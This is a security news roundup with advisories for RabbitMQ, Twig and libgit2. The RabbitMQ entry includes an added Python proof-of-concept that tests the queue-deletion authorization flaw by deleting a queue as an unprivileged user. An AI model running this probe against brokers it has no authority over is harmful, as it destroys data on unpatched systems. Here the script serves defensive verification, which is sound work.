Security
Headlines

Latest News

Chinese Gamers Targeted in Winos4.0 Framework Scam

Campaigns like Silver Fox and Void Arachne are deploying the framework, using social media and messaging platforms to lure in victims.

DARKReading
#auth
Google Cloud to Enforce MFA on Accounts in 2025

Google Cloud will take a phased approach to make multifactor authentication mandatory for all users.

German Law Could Protect Researchers Reporting Vulns

The draft amendment also includes prison time for those who access systems to maliciously spy or intercept data.

Attackers Breach IT-Based Networks Before Jumping to ICS/OT Systems

SANS's "2024 State of ICS/OT Cybersecurity" report highlights the most common attack vectors used against ICS/OT networks.

International Police Effort Obliterates Cybercrime Network

Interpol's operation disrupted 22,000 malicious IP addresses, 59 servers and 43 electronic devices, and led to the arrest of 41 suspected cybercriminals.

GHSA-pj33-75x5-32j4: RabbitMQ HTTP API's queue deletion endpoint does not verify that the user has a required permission

### Summary

Queue deletion via the HTTP API was not verifying the `configure` permission of the user.

### Impact

Users who had all of the following:

1. Valid credentials
2. Some permissions for the target virtual host
3. HTTP API access

could delete queues they had no (deletion) permissions for.

### Workarounds

Disable the management plugin and use, for example, [Prometheus and Grafana](https://www.rabbitmq.com/docs/prometheus) for monitoring.

### OWASP Classification

OWASP Top 10 A01:2021 – Broken Access Control
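The advisory describes a missing authorization check on one management-API path, so the practical question for an operator is whether their broker refuses a queue deletion from a user who lacks `configure` on the vhost. The probe below is an added example, not RabbitMQ project code. It issues `DELETE /api/queues/{vhost}/{name}` (the management API's queue deletion endpoint) as a deliberately low-privilege test user and classifies the HTTP status: on a fixed broker the request is refused, on a vulnerable one the queue is actually deleted and the API answers 204, so point it only at a throwaway queue. The base URL, user names and queue name are assumptions for illustration; the management plugin has historically answered authorization failures with 401 rather than 403, so both are treated as "enforced".

```python
"""Probe whether a RabbitMQ management API enforces the `configure`
permission on queue deletion (the check GHSA-pj33-75x5-32j4 says was missing).

Added example, not RabbitMQ project code. Run it with a test user that has
valid credentials and some permission on the vhost but NO configure permission
matching the queue name, against a scratch queue you can afford to lose.
"""
import base64
import sys
import urllib.error
import urllib.parse
import urllib.request

DENIED = "enforced"       # broker refused the deletion: permission is checked
DELETED = "vulnerable"    # broker deleted a queue the user may not configure
MISSING = "no-such-queue"  # nothing to conclude; create the scratch queue first


def delete_request(base_url, user, password, vhost, queue):
    """Build the DELETE /api/queues/{vhost}/{name} request with Basic auth.

    vhost and queue are percent-encoded so the default vhost "/" becomes %2F,
    which is how the management API expects it in the path.
    """
    path = "/api/queues/%s/%s" % (
        urllib.parse.quote(vhost, safe=""),
        urllib.parse.quote(queue, safe=""),
    )
    req = urllib.request.Request(base_url.rstrip("/") + path, method="DELETE")
    token = base64.b64encode(("%s:%s" % (user, password)).encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    return req


def classify(status):
    """Map the HTTP status of the deletion attempt to a verdict."""
    if status == 204:
        return DELETED
    if status in (401, 403):
        return DENIED
    if status == 404:
        return MISSING
    raise ValueError("unexpected status %d from management API" % status)


def http_status(req):
    """Default transport: send the request and return the HTTP status code."""
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def probe_queue_delete(base_url, user, password, vhost, queue,
                       transport=http_status):
    """Return DENIED, DELETED or MISSING for one deletion attempt.

    `transport` is injectable so the classification can be exercised offline.
    """
    req = delete_request(base_url, user, password, vhost, queue)
    return classify(transport(req))


if __name__ == "__main__":
    # Assumed values for illustration: a local broker, a low-privilege user
    # "probe" and a scratch queue named "glsa-probe" on the default vhost.
    base = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:15672"
    verdict = probe_queue_delete(base, "probe", "probe-password", "/", "glsa-probe")
    print("queue deletion permission check:", verdict)
```

Create the scratch queue with an administrative account before running the probe, and grant the probe user only `read`/`write` regexes on the vhost (no `configure` match for the queue name); a `vulnerable` verdict means the queue is now gone and the broker needs the fixed release.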

GHSA-jjxq-ff2g-95vh: Twig has unguarded calls to `__isset()` and to array-accesses when the sandbox is enabled

### Description

In a sandbox, an attacker can access attributes of array-like objects, as they were not checked by the security policy. They are now checked via the property policy, and the `__isset()` method is now called only after the security check. **This is a BC break.**

### Resolution

The sandbox mode now ensures that access to an array-like object's properties is allowed by the policy. The patch for this issue is available [here](https://github.com/twigphp/twig/commit/249615d3bfc3ce1672815a265458c0bcf8f7cc61) for branch 3.11.x.

### Credits

We would like to thank Jamie Schouten for reporting the issue and Nicolas Grekas for providing the fix.

GHSA-6377-hfv9-hqf6: Twig has unguarded calls to `__toString()` when nesting an object into an array

### Description

In a sandbox, an attacker can call `__toString()` on an object even if the `__toString()` method is not allowed by the security policy, when the object is part of an array or an argument list (arguments to a function or a filter, for instance).

### Resolution

The sandbox mode now checks the `__toString()` method call on all objects. The patch for this issue is available [here](https://github.com/twigphp/twig/commit/407647c1036518c90b0188bb31b55f19ca84c328) for branch 3.x.

### Credits

We would like to thank Jamie Schouten for reporting the issue and Fabien Potencier for providing the fix.

Despite Emerging Regulations, Mobile Device and IoT Security Requires More Industry Attention

Omdia Principal Analyst Hollie Hennessy says that until a promising new set of regulations around the world comes online, connected device security entails a shared responsibility among consumers, enterprises, and manufacturers.

Gentoo Linux Security Advisory 202411-05

Gentoo Linux Security Advisory 202411-05 - Multiple vulnerabilities have been discovered in libgit2, the worst of which could lead to arbitrary code execution. Versions below 1.7.2 are affected; users should upgrade to 1.7.2 or later.